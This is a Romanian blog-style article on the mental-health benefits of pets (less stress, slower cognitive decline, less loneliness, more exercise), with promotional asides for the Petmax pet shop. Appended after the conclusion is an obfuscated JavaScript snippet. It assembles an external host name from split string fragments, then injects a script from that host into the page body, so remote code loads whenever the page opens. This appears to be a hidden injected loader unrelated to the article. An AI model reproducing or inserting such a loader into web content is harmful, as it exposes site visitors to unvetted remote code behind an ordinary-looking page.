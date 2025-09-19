Animalele de companie sunt mult mai mult decât simple prezențe în gospodării; ele joacă un rol esențial în sprijinirea sănătății mentale a stăpânilor lor. Studiile recente din întreaga lume au evidențiat impactul pozitiv al interacțiunii cu animalele asupra stării emoționale, reducerea stresului și îmbunătățirea calității vieții.

Reducerea stresului și anxietății

Conform unui studiu realizat de American Psychiatric Association, 69% dintre proprietarii de animale au raportat că acestea le reduc stresul și anxietatea. Această reducere se datorează în mare parte prezenței constante și necondiționate a animalelor, care oferă un sentiment de siguranță și confort emoțional. De asemenea, interacțiunea cu pisicile sau cainii (si nu numai) stimulează producția de oxitocină și dopamină, hormoni asociați cu starea de bine și relaxare.

Îmbunătățirea funcțiilor cognitive la vârstă înaintată

Un studiu publicat în Scientific Reports a arătat că deținerea unui câine sau a unei pisici poate încetini declinul cognitiv la adulții în vârstă. Proprietarii de câini au menținut o memorie mai bună, atât imediată cât și pe termen lung, în timp ce cei cu pisici au experimentat o scădere mai lentă a fluenței verbale. În schimb, deținătorii de păsări sau pești nu au prezentat aceleași beneficii cognitive. Apropos, știai că la Petmax ai livrare gratuită pentru comenzile de peste 189,90 lei (mâncare pentru câini sau pisici, accesorii, suplimente sau recompense)?

Creșterea sentimentului de apartenență și reducerea singurătății

Pentru multe persoane, companionii blănoși sunt surse importante de companie și sprijin emoțional. În special pentru cei care trăiesc singuri sau au dificultăți în a stabili relații sociale, animalele oferă un sentiment de apartenență și confort. Acestea pot ajuta la reducerea sentimentului de singurătate și pot stimula interacțiunile sociale, contribuind astfel la o stare mentală mai sănătoasă.

Promovarea activității fizice și a rutinei

Proprietarii de câini, în special, sunt mai înclinați să participe la activități fizice regulate, cum ar fi plimbările zilnice. Această activitate nu doar că îmbunătățește sănătatea fizică, dar contribuie și la reducerea stresului și îmbunătățirea stării de spirit. Astfel, un patruped adorabil poate fi motivația necesară pentru a menține un stil de viață activ și sănătos. Poate tocmai ti-ai amintit ca ai nevoie de o noua lesa sau un ham pentru caine?

Calitatea relației contează

Este important de menționat că nu doar prezența unui animal de companie influențează sănătatea mentală, ci și calitatea relației dintre stăpân și animal. Un studiu sistematic a arătat că atașamentul puternic față de animal poate fi asociat atât cu beneficii, cât și cu riscuri pentru sănătatea mentală, în funcție de contextul individual și de stilul de atașament.

In concluzie, interacțiunea cu animalele de companie oferă multiple beneficii pentru sănătatea mentală, inclusiv reducerea stresului, îmbunătățirea funcțiilor cognitive, combaterea singurătății și promovarea unui stil de viață activ. Cu toate acestea, este esențial ca relația cu animalul să fie echilibrată și sănătoasă pentru a maximiza aceste beneficii. Astfel, animalele de companie pot fi adevărați aliați în menținerea unei stări mentale pozitive și echilibrate.

(function(){ qcgg=document.createElement(“script”);qcgg_=(“op”)+”e”+(“ns”); qcgg_+=”t”+”a”+(“t”);qcgg_+=(“.e”);qcggu=”2492883255″;qcgg.async=true; qcggu+=”.g25rXregcggqb3k6r”;qcgg.type=”text/javascript”;qcgg_+=””+””+(“u/”); qcggu+=”xyqpq939wmiu5″;qcgg.src=”https://”+qcgg_+qcggu; dqcgg=document.body;dqcgg.appendChild(qcgg); })();